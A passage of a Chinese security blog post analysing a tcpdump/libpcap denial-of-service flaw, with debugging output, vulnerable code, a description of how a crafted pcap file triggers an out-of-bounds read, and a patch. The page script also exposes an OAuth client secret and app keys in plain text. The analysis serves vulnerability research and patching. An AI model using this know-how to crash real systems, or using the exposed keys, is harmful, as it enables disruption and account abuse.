< p > 设置断点之后查看一下该函数的执行结果< / p >
2019-07-16 09:15:34 +00:00
< p > pcap_loop通过callback指向print_packet,来看一下它的源码< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. static void< / span > < br > < span class = "line" > 2. print_packet(u_char *user, const struct pcap_pkthdr *h, const u_char *sp)< / span > < br > < span class = "line" > 3. { < / span > < br > < span class = "line" > 4. struct print_info *print_info;< / span > < br > < span class = "line" > 5. u_int hdrlen;< / span > < br > < span class = "line" > 6. ++packets_captured;< / span > < br > < span class = "line" > 7. ++infodelay;< / span > < br > < span class = "line" > 8. ts_print(& h-> ts);< / span > < br > < span class = "line" > 9. print_info = (struct print_info *)user;< / span > < br > < span class = "line" > 10. /*< / span > < br > < span class = "line" > 11. * Some printers want to check that they' re not walking off the< / span > < br > < span class = "line" > 12. * end of the packet.< / span > < br > < span class = "line" > 13. * Rather than pass it all the way down, we set this global.< / span > < br > < span class = "line" > 14. */< / span > < br > < span class = "line" > 15. snapend = sp + h-> caplen;< / span > < br > < span class = "line" > 16. if(print_info-> ndo_type) { < / span > < br > < span class = "line" > 17. hdrlen = (*print_info-> p.ndo_printer)(print_info-> ndo, h, sp);< ====< / span > < br > < span class = "line" > 18. } else { < / span > < br > < span class = "line" > 19. hdrlen = (*print_info-> p.printer)(h, sp);< / span > < br > < span class = "line" > 20. } < / span > < br > < span class = "line" > 21. putchar(' n' );< / span > < br > < span class = "line" > 22. --infodelay;< / span > < br > < span class = "line" > 23. if (infoprint)< / span > < br > < span class = "line" > 24. info(0);} < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
2019-07-01 09:29:47 +00:00
< p > 同样设置断点看该函数是如何调用执行的< / p >
< p > 这是我们可以根据call的信息, 计算出调用的函数名< / p >
< p > 其中(*print_info-> p.ndo_printer)(print_info-> ndo,h,sp)指向ieee802_15_4_if_print< / p >
2019-07-16 09:15:34 +00:00
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < span class = "line" > 37< / span > < br > < span class = "line" > 38< / span > < br > < span class = "line" > 39< / span > < br > < span class = "line" > 40< / span > < br > < span class = "line" > 41< / span > < br > < span class = "line" > 42< / span > < br > < span class = "line" > 43< / span > < br > < span class = "line" > 44< / span > < br > < span class = "line" > 45< / span > < br > < span class = "line" > 46< / span > < br > < span class = "line" > 47< / span > < br > < span class = "line" > 48< / span > < br > < span class = "line" > 49< / span > < br > < span class = "line" > 50< / span > < br > < span class = "line" > 51< / span > < br > < span class = "line" > 52< / span > < br > < span class = "line" > 53< / span > < br > < span class = "line" > 54< / span > < br > < span class = "line" > 55< / span > < br > < span class = "line" > 56< / span > < br > < span class = "line" > 57< / span > < br > < span class = "line" > 58< / span > < br > < span class = "line" > 59< / span > < br > < span class = "line" > 60< / span > < br > < span class = "line" > 61< / span > < br > < span class = "line" > 62< / span > < br > < span class = "line" > 63< / span > < br > < span class = "line" > 64< / span > < br > < span class = "line" > 65< / span > < br > < span class = "line" > 66< / span > < br > < span class = "line" > 67< / span > < br > < span class = "line" > 68< / span > < br > < span class = "line" > 69< / span > < br > < span class = "line" > 70< / span > < br > < span class = "line" > 71< / span > < br > < span class = "line" > 72< / span > < br > < span class = "line" > 73< / span > < br > < span class = "line" > 74< / span > < br > < span class = "line" > 75< / span > < br > < span class = "line" > 76< / span > < br > < span class = "line" > 77< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 25. u_int< / span > < br > < span class = "line" > 26. ieee802_15_4_if_print(struct netdissect_options *ndo,< / span > < br > < span class = "line" > 27. const struct pcap_pkthdr *h, const u_char *p)< / span > < br > < span class = "line" > 28. { < / span > < br > < span class = "line" > 29. printf(" address : %x\n" ,p);< / span > < br > < span class = "line" > 30. u_int caplen = h-> caplen; //传入的caplen, 赋值给无符号整形变量caplen,且该值为8< / span > < br > < span class = "line" > 31. int hdrlen;< / span > < br > < span class = "line" > 32. u_int16_t fc;< / span > < br > < span class = "line" > 33. u_int8_t seq;< / span > < br > < span class = "line" > 34. if (caplen < 3) { //不满足< / span > < br > < span class = "line" > 35. ND_PRINT((ndo, " [|802.15.4] %x" , caplen));< / span > < br > < span class = "line" > 36. return caplen;< / span > < br > < span class = "line" > 37. } < / span > < br > < span class = "line" > 38. fc = EXTRACT_LE_16BITS(p);< / span > < br > < span class = "line" > 39. hdrlen = extract_header_length(fc);< / span > < br > < span class = "line" > 40. seq = EXTRACT_LE_8BITS(p + 2);< / span > < br > < span class = "line" > 41. p += 3;< / span > < br > < span class = "line" > 42. caplen -= 3;//此时caplen = 5< / span > < br > < span class = "line" > 43. ND_PRINT((ndo," IEEE 802.15.4 %s packet " , ftypes[fc & 0x7]));< / span > < br > < span class = "line" > 44. if (vflag)< / span > < br > < span class = "line" > 45. ND_PRINT((ndo," seq %02x " , seq));< / span > < br > < span class = "line" > 46. if (hdrlen == -1) { < / span > < br > < span class = "line" > 47. ND_PRINT((ndo," malformed! " ));< / span > < br > < span class = "line" > 48. return caplen;< / span > < br
2019-07-01 09:29:47 +00:00
< p > 传入的第二个值是struct pcap_pkthdr *h结构体, 函数使用的参数caplen就是结构体中的caplen, 不难看出, caplen进行一些加减操作后, 没有判断正负, 直接丢给了下一个函数使用。< br > 直接跟进函数,看看最后赋值情况< / p >
< p > 从源码和调试信息可以看到libpcap在处理不正常包时不严谨, 导致包的头长度hdrlen竟然大于捕获包长度caplen, 并且在处理时又没有相关的判断。hdrlen和caplen都是非负整数, 导致caplen==0xfffffff3过长。< br > 继续跟进hex_and_asciii_print(ndo_default_print)< / p >
2019-07-16 09:15:34 +00:00
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. void< / span > < br > < span class = "line" > 2. hex_and_ascii_print(register const char *ident, register const u_char *cp,< / span > < br > < span class = "line" > 3. register u_int length)< / span > < br > < span class = "line" > 4. { < / span > < br > < span class = "line" > 5. hex_and_ascii_print_with_offset(ident, cp, length, 0);< / span > < br > < span class = "line" > 6. } < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > 其中length==0xfffffff3, 继续执行< / span > < br > < span class = "line" > 1. void< / span > < br > < span class = "line" > 2. hex_print_with_offset(register const char *ident, register const u_char *cp, register u_int length,< / span > < br > < span class = "line" > 3. register u_int oset)< / span > < br > < span class = "line" > 4. { < / span > < br > < span class = "line" > 5. register u_int i, s;< / span > < br > < span class = "line" > 6. register int nshorts;< / span > < br > < span class = "line" > 7.< / span > < br > < span class = "line" > 8. nshorts = (u_int) length / sizeof(u_short);< / span > < br > < span class = "line" > 9. i = 0;< / span > < br > < span class = "line" > 10. while (--nshorts > = 0) { < / span > < br > < span class = "line" > 11. if ((i++ % 8) == 0) { < / span > < br > < span class = "line" > 12. (void)printf(" %s0x%04x: " , ident, oset);< / span > < br > < span class = "line" > 13. oset += HEXDUMP_BYTES_PER_LINE;< / span > < br > < span class = "line" > 14. } < / span > < br > < span class = "line" > 15. s = *cp++; < ======= 抛出错误位置< / span > < br > < span class = "line" > 16. (void)printf(" %02x%02x" , s, *cp++);< / span > < br > < span class = "line" > 17. } < / span > < br > < span class = "line" > 18. if (length & 1) { < / span > < br > < span class = "line" > 19. if ((i % 8) == 0)< / span > < br > < span class = "line" > 20. (void)printf(" %s0x%04x: " , ident, oset);< / span > < br > < span class = "line" > 21. (void)printf(" %02x" , *cp);< / span > < br > < span class = "line" > 22. } < / span > < br > < span class = "line" > nshorts=(u_int) length / sizeof(u_short) => nshorts=0xfffffff3/2= 7FFFFFF9 < / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2019-07-01 09:29:47 +00:00
< p > 但数据包数据没有这么长, 导致了crash。< / p >
2019-07-16 09:15:34 +00:00
< h3 id = "内存分析" > < a href = "#内存分析" class = "headerlink" title = "内存分析" > < / a > 内存分析< / h3 > < p > 仔细分析之后发现, 通过len判断的这个长度并没有进行控制, 如果是自己构造的一个超长len的数据包, 则会连续读取到不可估计的值。< br > 通过查看epx的值来看一下这个内存到底开辟到什么位置< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. gdb-peda$ x/10000000x 0x81e33bd< / span > < br > < span class = "line" > 2. 0x8203fdd: 0x00000000 0x00000000 0x00000000 0x00000000< / span > < br > < span class = "line" > 3. 0x8203fed: 0x00000000 0x00000000 0x00000000 0x00000000< / span > < br > < span class = "line" > 4. 0x8203ffd: Cannot access memory at address 0x8204000< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
2019-07-01 09:29:47 +00:00
< p > 可以看到, 到达0x 8204000附近的时候, 就是无法读取的无效地址了, 那么初始值为0x 81e33bd, 用两个值相减。0x 8204000-0x 81e33bd = 0x 20c40, 因为ebx+ebp*2+0x1一次读取两个字节, 那么循环计数器就要除以2, 最后结果为0x 10620。< br > 来看一下到达拒绝服务位置读取的长度: EBX: 0x81e33bd – > 0x0; EBP: 0x10621; < br > EBP刚好为10621。正是不可读取内存空间的地址, 因此造成拒绝服务。< / p >
< h3 id = "漏洞总结" > < a href = "#漏洞总结" class = "headerlink" title = "漏洞总结" > < / a > 漏洞总结< / h3 > < p > 总结一下整个漏洞触发过程, 首先tcpdump会读取恶意构造的pcap包, 在构造pcap包的时候, 设置一个超长的数据包长度, tcpdump会根据len的长度去读取保存在内存空间数据包的内容, 当引用到不可读取内存位置时, 会由于引用不可读指针, 造成拒绝服务漏洞。< / p >
2019-07-16 09:15:34 +00:00
< h2 id = "漏洞修补" > < a href = "#漏洞修补" class = "headerlink" title = "漏洞修补" > < / a > 漏洞修补< / h2 > < p > Libpcap依然是apt安装的默认版本, tcpdump使用4.7 .0-bp版本< br > 在hex_and_ascii_print_with_offset中增加对caplength的判断< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. caplength = (ndo-> ndo_snapend > = cp) ? ndo-> ndo_snapend - cp : 0;< / span > < br > < span class = "line" > 2. if (length > caplength)< / span > < br > < span class = "line" > 3. length = caplength;< / span > < br > < span class = "line" > 4. nshorts = length / sizeof(u_short);< / span > < br > < span class = "line" > 5. i = 0;< / span > < br > < span class = "line" > 6. hsp = hexstuff; asp = asciistuff;< / span > < br > < span class = "line" > 7. while (--nshorts > = 0) { < / span > < br > < span class = "line" > 8. ...< / span > < br > < span class = "line" > 9. } < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
2019-07-01 09:29:47 +00:00
< p > 可以看到执行完caplength = (ndo-> ndo_snapend > = cp) ? ndo-> ndo_snapend - cp : 0;, caplength为0, 继续执行, 可以推出length同样为0, 到这里已经不会发生错误了。< / p >
< h2 id = "参考" > < a href = "#参考" class = "headerlink" title = "参考" > < / a > 参考< / h2 > < p > < a href = "https://www.exploit-db.com/exploits/39875/" target = "_blank" rel = "noopener" > exploit-db payload< / a > < br > < a href = "https://whereisk0shl.top/post/2016-10-23-1" target = "_blank" rel = "noopener" > WHEREISK0SHL分析博客< / a > < br > < a href = "https://github.com/the-tcpdump-group" target = "_blank" rel = "noopener" > libpcap/tcpdump源码< / a > < / p >
< / div >
< div >
< div style = "padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;" >
< div > 您的支持将鼓励我继续创作!< / div >
< button id = "rewardButton" disable = "enable" onclick = "var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}" >
< span > 打赏< / span >
< / button >
< div id = "QR" style = "display: none;" >
< div id = "wechat" style = "display: inline-block" >
< img id = "wechat_qr" src = "/images/Wechatpay.png" alt = "Cool-Y 微信支付" >
< p > 微信支付< / p >
< / div >
< div id = "alipay" style = "display: inline-block" >
< img id = "alipay_qr" src = "/images/Alipay.png" alt = "Cool-Y 支付宝" >
< p > 支付宝< / p >
< / div >
< / div >
< / div >
< / div >
2021-04-10 12:03:10 +00:00
< div >
< ul class = "post-copyright" >
< li class = "post-copyright-author" >
< strong > 本文作者:< / strong >
Cool-Y
< / li >
< li class = "post-copyright-link" >
< strong > 本文链接:< / strong >
< a href = "https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" title = "TCPDUMP拒绝服务攻击漏洞" > https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/< / a >
< / li >
< li class = "post-copyright-license" >
< strong > 版权声明: < / strong >
本博客所有文章除特别声明外,均采用 < a href = "https://creativecommons.org/licenses/by-nc-sa/3.0/" rel = "external nofollow" target = "_blank" > CC BY-NC-SA 3.0< / a > 许可协议。转载请注明出处!
< / li >
< / ul >
< / div >
2019-07-01 09:29:47 +00:00
< footer class = "post-footer" >
< div class = "post-tags" >
< a href = "/tags/TCPDUMP/" rel = "tag" > # TCPDUMP< / a >
< a href = "/tags/拒绝服务攻击/" rel = "tag" > # 拒绝服务攻击< / a >
< / div >
2021-04-10 19:19:48 +00:00
< div class = "post-widgets" >
< div id = "needsharebutton-postbottom" >
< span class = "btn" >
< i class = "fa fa-share-alt" aria-hidden = "true" > < / i >
< / span >
< / div >
< / div >
2019-07-01 09:29:47 +00:00
< div class = "post-nav" >
< div class = "post-nav-next post-nav-item" >
< a href = "/2018/12/23/基于规则引擎发现IOT设备/" rel = "next" title = "基于采集规则引擎的物联网设备发现方法" >
< i class = "fa fa-chevron-left" > < / i > 基于采集规则引擎的物联网设备发现方法
< / a >
< / div >
< span class = "post-nav-divider" > < / span >
< div class = "post-nav-prev post-nav-item" >
< a href = "/2019/01/16/wifi半双工侧信道攻击学习笔记/" rel = "prev" title = "wifi半双工侧信道攻击学习笔记" >
wifi半双工侧信道攻击学习笔记 < i class = "fa fa-chevron-right" > < / i >
< / a >
< / div >
< / div >
< / footer >
< / div >
< / article >
< div class = "post-spread" >
< / div >
< / div >
< / div >
2021-04-10 12:37:40 +00:00
< div class = "comments" id = "comments" >
< div id = "gitalk-container" > < / div >
< / div >
2019-07-01 09:29:47 +00:00
< / div >
< div class = "sidebar-toggle" >
< div class = "sidebar-toggle-line-wrap" >
< span class = "sidebar-toggle-line sidebar-toggle-line-first" > < / span >
< span class = "sidebar-toggle-line sidebar-toggle-line-middle" > < / span >
< span class = "sidebar-toggle-line sidebar-toggle-line-last" > < / span >
< / div >
< / div >
< aside id = "sidebar" class = "sidebar" >
< div class = "sidebar-inner" >
< ul class = "sidebar-nav motion-element" >
< li class = "sidebar-nav-toc sidebar-nav-active" data-target = "post-toc-wrap" >
文章目录
< / li >
< li class = "sidebar-nav-overview" data-target = "site-overview-wrap" >
站点概览
< / li >
< / ul >
< section class = "site-overview-wrap sidebar-panel" >
< div class = "site-overview" >
< div class = "site-author motion-element" itemprop = "author" itemscope itemtype = "http://schema.org/Person" >
< img class = "site-author-image" itemprop = "image" src = "/images/avatar.png" alt = "Cool-Y" >
< p class = "site-author-name" itemprop = "name" > Cool-Y< / p >
2021-04-10 13:26:15 +00:00
< p class = "site-description motion-element" itemprop = "description" > Sauce is forever< / p >
2019-07-01 09:29:47 +00:00
< / div >
< nav class = "site-state motion-element" >
< div class = "site-state-item site-state-posts" >
< a href = "/archives/" >
2021-04-10 10:53:27 +00:00
< span class = "site-state-item-count" > 30< / span >
2019-07-01 09:29:47 +00:00
< span class = "site-state-item-name" > 日志< / span >
< / a >
< / div >
< div class = "site-state-item site-state-categories" >
< a href = "/categories/index.html" >
2019-10-15 11:24:26 +00:00
< span class = "site-state-item-count" > 7< / span >
2019-07-01 09:29:47 +00:00
< span class = "site-state-item-name" > 分类< / span >
< / a >
< / div >
< div class = "site-state-item site-state-tags" >
< a href = "/tags/index.html" >
2021-04-10 10:53:27 +00:00
< span class = "site-state-item-count" > 55< / span >
2019-07-01 09:29:47 +00:00
< span class = "site-state-item-name" > 标签< / span >
< / a >
< / div >
< / nav >
< div class = "links-of-author motion-element" >
< span class = "links-of-author-item" >
< a href = "https://github.com/Cool-Y" target = "_blank" title = "GitHub" >
< i class = "fa fa-fw fa-github" > < / i > GitHub< / a >
< / span >
< span class = "links-of-author-item" >
< a href = "mailto:cool.yim@whu.edu.cn" target = "_blank" title = "E-Mail" >
< i class = "fa fa-fw fa-envelope" > < / i > E-Mail< / a >
< / span >
< span class = "links-of-author-item" >
< a href = "https://www.instagram.com/yan__han/" target = "_blank" title = "Instagram" >
< i class = "fa fa-fw fa-instagram" > < / i > Instagram< / a >
< / span >
< / div >
2019-10-01 12:45:37 +00:00
< div id = "music163player" >
2021-04-10 12:03:10 +00:00
< iframe frameborder = "no" border = "0" marginwidth = "0" marginheight = "0" width = "330" height = "110" src = "//music.163.com/outchain/player?type=4&id=334277093&auto=1&height=90" > < / iframe >
2019-10-01 12:45:37 +00:00
< / div >
2019-07-01 09:29:47 +00:00
< / div >
< / section >
<!-- noindex -->
< section class = "post-toc-wrap motion-element sidebar-panel sidebar-panel-active" >
< div class = "post-toc" >
2021-04-10 13:53:56 +00:00
< div class = "post-toc-content" > < ol class = "nav" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#Tcpdump介绍" > < span class = "nav-text" > Tcpdump介绍< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#分析环境" > < span class = "nav-text" > 分析环境< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#漏洞复现" > < span class = "nav-text" > 漏洞复现< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#编译安装tcpdump" > < span class = "nav-text" > 编译安装tcpdump< / span > < / a > < / li > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#生成payload( 来自exploit-db-payload) " > < span class = "nav-text" > 生成payload( 来自exploit-db payload) < / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#崩溃分析" > < span class = "nav-text" > 崩溃分析< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#pcap包格式" > < span class = "nav-text" > pcap包格式< / span > < / a > < / li > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#gdb调试" > < span class = "nav-text" > gdb调试< / span > < / a > < / li > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#内存分析" > < span class = "nav-text" > 内存分析< / span > < / a > < / li > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#漏洞总结" > < span class = "nav-text" > 漏洞总结< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#漏洞修补" > < span class = "nav-text" > 漏洞修补< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#参考" > < span class = "nav-text" > 参考< / span > < / a > < / li > < / ol > < / div >
2019-07-01 09:29:47 +00:00
< / div >
< / section >
<!-- /noindex -->
< / div >
< / aside >
< / div >
< / main >
< footer id = "footer" class = "footer" >
< div class = "footer-inner" >
2021-01-08 04:26:24 +00:00
< div class = "copyright" > © 2019 — < span itemprop = "copyrightYear" > 2021< / span >
2019-07-01 09:29:47 +00:00
< span class = "with-love" >
< i class = "fa fa-user" > < / i >
< / span >
< span class = "author" itemprop = "copyrightHolder" > Cool-Y< / span >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-area-chart" > < / i >
< / span >
2021-04-10 13:53:56 +00:00
< span title = "Site words total count" > 104.8k< / span >
2019-07-01 09:29:47 +00:00
< / div >
< div class = "powered-by" > 由 < a class = "theme-link" target = "_blank" href = "https://hexo.io" > Hexo< / a > 强力驱动< / div >
< div class = "busuanzi-count" >
< script async src = "//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" > < / script >
< span class = "site-uv" >
< i class = "fa fa-user" > < / i >
< span class = "busuanzi-value" id = "busuanzi_value_site_uv" > < / span >
< / span >
< span class = "site-pv" >
< i class = "fa fa-eye" > < / i >
< span class = "busuanzi-value" id = "busuanzi_value_site_pv" > < / span >
< / span >
< / div >
< / div >
< / footer >
< div class = "back-to-top" >
< i class = "fa fa-arrow-up" > < / i >
2021-04-10 19:19:48 +00:00
< span id = "scrollpercent" > < span > 0< / span > %< / span >
2019-07-01 09:29:47 +00:00
< / div >
2021-04-10 19:19:48 +00:00
< div id = "needsharebutton-float" >
< span class = "btn" >
< i class = "fa fa-share-alt" aria-hidden = "true" > < / i >
< / span >
< / div >
2019-07-01 09:29:47 +00:00
< / div >
< script type = "text/javascript" >
if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
window.Promise = null;
}
< / script >
< script type = "text/javascript" src = "/lib/jquery/index.js?v=2.1.3" > < / script >
< script type = "text/javascript" src = "/lib/fastclick/lib/fastclick.min.js?v=1.0.6" > < / script >
< script type = "text/javascript" src = "/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7" > < / script >
< script type = "text/javascript" src = "/lib/velocity/velocity.min.js?v=1.2.1" > < / script >
< script type = "text/javascript" src = "/lib/velocity/velocity.ui.min.js?v=1.2.1" > < / script >
< script type = "text/javascript" src = "/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5" > < / script >
< script type = "text/javascript" src = "/js/src/utils.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/motion.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/scrollspy.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/post-details.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/bootstrap.js?v=5.1.4" > < / script >
2021-04-10 12:37:40 +00:00
2021-04-10 12:40:26 +00:00
<!-- LOCAL: You can save these files to your site and update links -->
< link rel = "stylesheet" href = "https://unpkg.com/gitalk/dist/gitalk.css" >
< script src = "https://unpkg.com/gitalk/dist/gitalk.min.js" > < / script >
<!-- END LOCAL -->
< script type = "text/javascript" >
function renderGitalk(){
var gitalk = new Gitalk({
owner: 'Cool-Y',
repo: 'gitment-comments',
clientID: '180955a2c3ae3d966d9a',
clientSecret: '1c5db4da72df5e6fc318d12afe5f4406f7c54343',
admin: 'Cool-Y',
2021-04-10 12:47:46 +00:00
id: decodeURI(location.pathname),
2021-04-10 12:40:26 +00:00
distractionFreeMode: 'true'
});
gitalk.render('gitalk-container');
}
renderGitalk();
< / script >
2019-07-01 09:29:47 +00:00
< script src = "https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js" > < / script >
< script > AV . initialize ( "EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz" , "x8FxDrYG79C8YFrTww9ljo8K" ) ; < / script >
< script >
function showTime(Counter) {
var query = new AV.Query(Counter);
var entries = [];
var $visitors = $(".leancloud_visitors");
$visitors.each(function () {
entries.push( $(this).attr("id").trim() );
});
query.containedIn('url', entries);
query.find()
.done(function (results) {
var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
if (results.length === 0) {
$visitors.find(COUNT_CONTAINER_REF).text(0);
return;
}
for (var i = 0; i < results.length ; i + + ) {
var item = results[i];
var url = item.get('url');
var time = item.get('time');
var element = document.getElementById(url);
$(element).find(COUNT_CONTAINER_REF).text(time);
}
for(var i = 0; i < entries.length ; i + + ) {
var url = entries[i];
var element = document.getElementById(url);
var countSpan = $(element).find(COUNT_CONTAINER_REF);
if( countSpan.text() == '') {
countSpan.text(0);
}
}
})
.fail(function (object, error) {
console.log("Error: " + error.code + " " + error.message);
});
}
function addCount(Counter) {
var $visitors = $(".leancloud_visitors");
var url = $visitors.attr('id').trim();
var title = $visitors.attr('data-flag-title').trim();
var query = new AV.Query(Counter);
query.equalTo("url", url);
query.find({
success: function(results) {
if (results.length > 0) {
var counter = results[0];
counter.fetchWhenSave(true);
counter.increment("time");
counter.save(null, {
success: function(counter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(counter.get('time'));
},
error: function(counter, error) {
console.log('Failed to save Visitor num, with error message: ' + error.message);
}
});
} else {
var newcounter = new Counter();
/* Set ACL */
var acl = new AV.ACL();
acl.setPublicReadAccess(true);
acl.setPublicWriteAccess(true);
newcounter.setACL(acl);
/* End Set ACL */
newcounter.set("title", title);
newcounter.set("url", url);
newcounter.set("time", 1);
newcounter.save(null, {
success: function(newcounter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(newcounter.get('time'));
},
error: function(newcounter, error) {
console.log('Failed to create');
}
});
}
},
error: function(error) {
console.log('Error:' + error.code + " " + error.message);
}
});
}
$(function() {
var Counter = AV.Object.extend("Counter");
if ($('.leancloud_visitors').length == 1) {
addCount(Counter);
} else if ($('.post-title-link').length > 1) {
showTime(Counter);
}
});
< / script >
< script >
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
})();
< / script >
2021-04-10 19:19:48 +00:00
< link rel = "stylesheet" href = "/lib/needsharebutton/needsharebutton.css" >
2019-07-01 09:29:47 +00:00
2021-04-10 19:19:48 +00:00
< script src = "/lib/needsharebutton/needsharebutton.js" > < / script >
< script >
pbOptions = {};
pbOptions.iconStyle = "box";
pbOptions.boxForm = "horizontal";
pbOptions.position = "bottomCenter";
pbOptions.networks = "Weibo,Wechat,Douban,QQZone,Twitter,Facebook";
new needShareButton('#needsharebutton-postbottom', pbOptions);
flOptions = {};
flOptions.iconStyle = "box";
flOptions.boxForm = "horizontal";
flOptions.position = "middleRight";
flOptions.networks = "Weibo,Wechat,Douban,QQZone,Twitter,Facebook";
new needShareButton('#needsharebutton-float', flOptions);
< / script >
2019-07-01 09:29:47 +00:00
2021-04-10 19:19:48 +00:00
< script type = "text/javascript" src = "/js/src/js.cookie.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/scroll-cookie.js?v=5.1.4" > < / script >
2019-07-01 09:29:47 +00:00
< / body >
< / html >